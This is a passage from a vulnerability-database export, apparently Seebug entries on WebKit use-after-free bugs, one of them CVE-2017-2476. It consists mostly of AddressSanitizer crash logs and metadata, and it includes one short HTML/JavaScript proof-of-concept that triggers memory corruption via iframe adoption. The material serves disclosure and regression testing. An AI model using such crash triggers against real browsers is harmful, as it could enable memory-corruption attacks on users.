(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f0e74)\r\n #9 0x111f268e8 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f08e8)\r\n #10 0x111f2775e in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f175e)\r\n #11 0x115a154b9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x11b74b9)\r\n #12 0x115a15104 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x11b7104)\r\n #13 0x115a1504b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x11b704b)\r\n #14 0x115a14e17 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x11b6e17)\r\n #15 0x115a1457c in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref<WebCore::Document>&&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x11b657c)\r\n #16 0x115a14746 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x11b6746)\r\n #17 0x115f0dc3a in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x16afc3a)\r\n #18 0x1154ddca8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc7fca8)\r\n #19 0x115b8e39c in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x133039c)\r\n #20 0x116d5dfb1 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24fffb1)\r\n #21 0x10d20ba77 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x2eba77)\r\n #22 0x10d208c18 in WebCore::ScriptController::globalObject(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x2e8c18)\r\n #23 0x10d4d2fc4 in WebKit::WebFrame::jsContextForWorld(WebKit::InjectedBundleScriptWorld*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x5b2fc4)\r\n #24 0x1247b2b61 in -[OpenSearchURLFinderController _jsContext] (/System/Library/StagedFrameworks/Safari/Safari.framework/Safari+0x330b61)\r\n #25 0x1247b28b9 in -[OpenSearchURLFinderController initWithBundleFrame:] (/System/Library/StagedFrameworks/Safari/Safari.framework/Safari+0x3308b9)\r\n #26 0x124523a29 in 
Safari::BrowserBundlePageController::determineOpenSearchURL(Safari::WK::BundleFrame const&) (/System/Library/StagedFrameworks/Safari/Safari.framework/Safari+0xa1a29)\r\n #27 0x1245239a3 in invocation function for block in Safari::BrowserBundlePageController::determineOpenSearchURLSoon() (/System/Library/StagedFrameworks/Safari/Safari.framework/Safari+0xa19a3)\r\n #28 0x7fffa0df7deb in __NSFireTimer (/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation+0xa9deb)\r\n #29 0x7fff9d2f6af3 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x92af3)\r\n```\r\n\r\npreviously allocated by thread T0 here:\r\n```\r\n #0 0x10f50b790 in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4b790)\r\n #1 0x7fff948155a0 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib+0x25a0)\r\n #2 0x11255b314 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1925314)\r\n #3 0x1125505db in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x191a5db)\r\n #4 0x1124e8635 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b2635)\r\n #5 0x1124e7918 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b1918)\r\n #6 0x1175c6389 in WebCore::XMLHttpRequest::create(WebCore::ScriptExecutionContext&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2d68389)\r\n #7 0x11644fc8c in 
WebCore::JSDOMConstructor<WebCore::JSXMLHttpRequest>::construct(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1bf1c8c)\r\n #8 0x111f0df2e in JSC::LLInt::handleHostCall(JSC::ExecState*, JSC::Instruction*, JSC::JSValue, JSC::CodeSpecializationKind) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d7f2e)\r\n #9 0x111f08149 in JSC::LLInt::setUpCall(JSC::ExecState*, JSC::Instruction*, JSC::CodeSpecializationKind, JSC::JSValue, JSC::LLIntCallLinkInfo*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d2149)\r\n #10 0x111f17827 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12e1827)\r\n #11 0x111f17502 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12e1502)\r\n #12 0x111f10aca in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12daaca)\r\n #13 0x111bca172 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf94172)\r\n #14 0x111b4fa33 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf19a33)\r\n #15 0x11123d5c1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6075c1)\r\n #16 0x11123d6eb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList 
const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6076eb)\r\n #17 0x11123da36 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x607a36)\r\n #18 0x1158ea62e in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x108c62e)\r\n #19 0x115bde086 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1380086)\r\n #20 0x115123415 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8c5415)\r\n #21 0x115122f3f in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8c4f3f)\r\n #22 0x1150ebe35 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x88de35)\r\n #23 0x1150ecf83 in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x88ef83)\r\n #24 0x1150ec9aa in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x88e9aa)\r\n #25 0x115020db5 in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7c2db5)\r\n #26 0x114f311df in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6d31df)\r\n #27 0x114f2be4e in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6cde4e)\r\n #28 0x11528c8e1 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa2e8e1)\r\n #29 0x115289dfa in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa2bdfa)\r\n\r\nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x138c4df) in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::EventTarget&)\r\nShadow bytes around the buggy address:\r\n 0x1c340000ed80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c340000ed90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c340000eda0: 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc\r\n 0x1c340000edb0: fc fc fc fc fc fc fc fc fc fc fc fa fa fa fa fa\r\n 0x1c340000edc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x1c340000edd0:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c340000ede0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c340000edf0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c340000ee00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c340000ee10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c340000ee20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\nShadow byte legend (one shadow byte 
represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==25184==ABORTING\r\n```", "cvss3": {}, "published": "2017-04-05T00:00:00", "type": "seebug", "title": "WebKit: WebCore::toJS use-after-free\uff08CVE-2017-2476\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2476"], "modified": "2017-04-05T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92904", "id": "SSV:92904", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T12:00:00", "description": "This is a regression test from: https://crbug.com/541206.\r\nBut I think it seems not possible to turn it into an UXSS in WebKit.\r\n\r\nPoC:\r\n```\r\n<body>\r\n<script>\r\n\r\nvar s = document.body.appendChild(document.createElement('script'));\r\ns.type = '0';\r\ns.textContent = 'document.body.appendChild(parent.i0)';\r\n\r\nvar i0 = s.appendChild(document.createElement('iframe'));\r\ns.type = '';\r\n\r\nvar f = document.body.appendChild(document.createElement('iframe'));\r\nf.contentDocument.adoptNode(i0);\r\nf.src = 'about:blank';\r\n\r\n</script>\r\n</body>\r\n```\r\n\r\nAsan Log:\r\n```\r\n==54938==ERROR: AddressSanitizer: heap-use-after-free on address 0x61a0000c5a80 at pc 0x0001151d388b bp 0x7fff584254c0 sp 0x7fff584254b8\r\nREAD of size 8 at 0x61a0000c5a80 thread T0\r\n #0 0x1151d388a in WTF::TypeCastTraits<WebCore::FrameView const, WebCore::ScrollView const, 
false>::isType(WebCore::Widget const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7788a)\r\n #1 0x115c355e8 in WebCore::FrameView::convertToContainingView(WebCore::IntPoint const&) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xad95e8)\r\n #2 0x1176e8df7 in WebCore::ScrollView::contentsToContainingViewContents(WebCore::IntPoint const&) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x258cdf7)\r\n #3 0x1176af5d4 in WebCore::ScrollingCoordinator::absoluteEventTrackingRegionsForFrame(WebCore::Frame const&) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x25535d4)\r\n #4 0x1176afb10 in WebCore::ScrollingCoordinator::absoluteEventTrackingRegions() const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2553b10)\r\n #5 0x115298ff9 in WebCore::AsyncScrollingCoordinator::frameViewLayoutUpdated(WebCore::FrameView&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x13cff9)\r\n #6 0x115c140f9 in WebCore::FrameView::performPostLayoutTasks() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xab80f9)\r\n #7 0x115c1c24a in WebCore::FrameView::layout(bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xac024a)\r\n #8 0x11586e89e in WebCore::Document::implicitClose() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x71289e)\r\n #9 0x115bdf621 in WebCore::FrameLoader::checkCompleted() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa83621)\r\n #10 0x115bdcafa in WebCore::FrameLoader::finishedParsing() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa80afa)\r\n #11 0x11588c12d in WebCore::Document::finishedParsing() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x73012d)\r\n #12 0x115d8f14d in WebCore::HTMLDocumentParser::prepareToStopParsing() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc3314d)\r\n #13 0x11592316c in 
WebCore::DocumentWriter::end() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7c716c)\r\n #14 0x1158e622f in WebCore::DocumentLoader::finishedLoading(double) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x78a22f)\r\n #15 0x1158ee2e5 in WebCore::DocumentLoader::maybeLoadEmpty() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7922e5)\r\n #16 0x1158ee6d3 in WebCore::DocumentLoader::startLoadingMainResource() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7926d3)\r\n #17 0x115beec01 in WebCore::FrameLoader::continueLoadAfterWillSubmitForm() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa92c01)\r\n #18 0x115be8495 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8c495)\r\n #19 0x115bfc4ba in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa04ba)\r\n #20 0x115bfc301 in void std::__1::__invoke_void_return_wrapper<void>::__call<WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool>(WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&&&, WebCore::ResourceRequest const&&&, WTF::PassRefPtr<WebCore::FormState>&&, bool&&) 
(webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa0301)\r\n #21 0x1170fd592 in std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1592)\r\n #22 0x1170fd300 in WebCore::PolicyCallback::call(bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1300)\r\n #23 0x1170ff0aa in WebCore::PolicyChecker::continueAfterNavigationPolicy(WebCore::PolicyAction) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa30aa)\r\n #24 0x107df7b2e in std::__1::function<void (WebCore::PolicyAction)>::operator()(WebCore::PolicyAction) const (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60fb2e)\r\n #25 0x107df7986 in WebKit::WebFrame::didReceivePolicyDecision(unsigned long long, WebCore::PolicyAction, unsigned long long, WebKit::DownloadID) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60f986)\r\n #26 0x107e07dbc in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::PolicyAction)>) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x61fdbc)\r\n #27 0x1170fea08 in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, bool, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa2a08)\r\n #28 0x115be72b3 in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) 
(webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8b2b3)\r\n #29 0x115be5de6 in WebCore::FrameLoader::loadWithNavigationAction(WebCore::ResourceRequest const&, WebCore::NavigationAction const&, WebCore::LockHistory, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa89de6)\r\n #30 0x115be2113 in WebCore::FrameLoader::loadURL(WebCore::FrameLoadRequest const&, WTF::String const&, WebCore::FrameLoadType, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa86113)\r\n #31 0x115bdb1c4 in WebCore::FrameLoader::loadFrameRequest(WebCore::FrameLoadRequest const&, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7f1c4)\r\n #32 0x115bda68e in WebCore::FrameLoader::urlSelected(WebCore::FrameLoadRequest const&, WebCore::Event*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7e68e)\r\n #33 0x116fdaa98 in WebCore::ScheduledLocationChange::fire(WebCore::Frame&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e7ea98)\r\n #34 0x116fd732f in WebCore::NavigationScheduler::timerFired() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e7b32f)\r\n #35 0x117b92cd1 in WebCore::ThreadTimers::sharedTimerFiredInternal() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2a36cd1)\r\n #36 0x116df2baf in WebCore::timerFired(__CFRunLoopTimer*, void*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1c96baf)\r\n #37 0x7fff93728243 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x91243)\r\n #38 0x7fff93727ece in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x90ece)\r\n #39 0x7fff93727a29 in 
__CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x90a29)\r\n #40 0x7fff9371f3e0 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x883e0)\r\n #41 0x7fff9371e973 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x87973)\r\n #42 0x7fff92caaacb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30acb)\r\n #43 0x7fff92caa900 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30900)\r\n #44 0x7fff92caa735 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30735)\r\n #45 0x7fff91250ae3 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x46ae3)\r\n #46 0x7fff919cb21e in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x7c121e)\r\n #47 0x7fff91245464 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3b464)\r\n #48 0x7fff9120fd7f in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x5d7f)\r\n #49 0x7fffa8edb8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x108c6)\r\n #50 0x7fffa8eda2e3 in xpc_main (/usr/lib/system/libxpc.dylib+0xf2e3)\r\n #51 0x1077d1b73 in main (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)\r\n #52 0x7fffa8c77254 in start (/usr/lib/system/libdyld.dylib+0x5254)\r\n\r\n0x61a0000c5a80 is located 0 bytes inside of 1232-byte region [0x61a0000c5a80,0x61a0000c5f50)\r\nfreed by thread T0 here:\r\n #0 0x10a087db9 in 
wrap_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4adb9)\r\n #1 0x10d0da25b in bmalloc::Deallocator::deallocateSlowCase(void*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18c725b)\r\n #2 0x11759427e in WTF::RefPtr<WebCore::Widget>::operator=(std::nullptr_t) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x243827e)\r\n #3 0x117592d19 in WebCore::RenderWidget::setWidget(WTF::RefPtr<WebCore::Widget>&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2436d19)\r\n #4 0x115bd46be in WebCore::Frame::createView(WebCore::IntSize const&, WebCore::Color const&, bool, WebCore::IntSize const&, WebCore::IntRect const&, bool, WebCore::ScrollbarMode, bool, WebCore::ScrollbarMode, bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa786be)\r\n #5 0x107e0df0b in WebKit::WebFrameLoaderClient::transitionToCommittedForNewPage() (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x625f0b)\r\n #6 0x115beb6cf in WebCore::FrameLoader::transitionToCommitted(WebCore::CachedPage*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8f6cf)\r\n #7 0x115bea77b in WebCore::FrameLoader::commitProvisionalLoad() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8e77b)\r\n #8 0x1158e6197 in WebCore::DocumentLoader::finishedLoading(double) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x78a197)\r\n #9 0x1158ee2e5 in WebCore::DocumentLoader::maybeLoadEmpty() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7922e5)\r\n #10 0x1158ee6d3 in WebCore::DocumentLoader::startLoadingMainResource() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7926d3)\r\n #11 0x115beec01 in WebCore::FrameLoader::continueLoadAfterWillSubmitForm() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa92c01)\r\n #12 
0x115be8495 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8c495)\r\n #13 0x115bfc4ba in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa04ba)\r\n #14 0x115bfc301 in void std::__1::__invoke_void_return_wrapper<void>::__call<WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool>(WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, 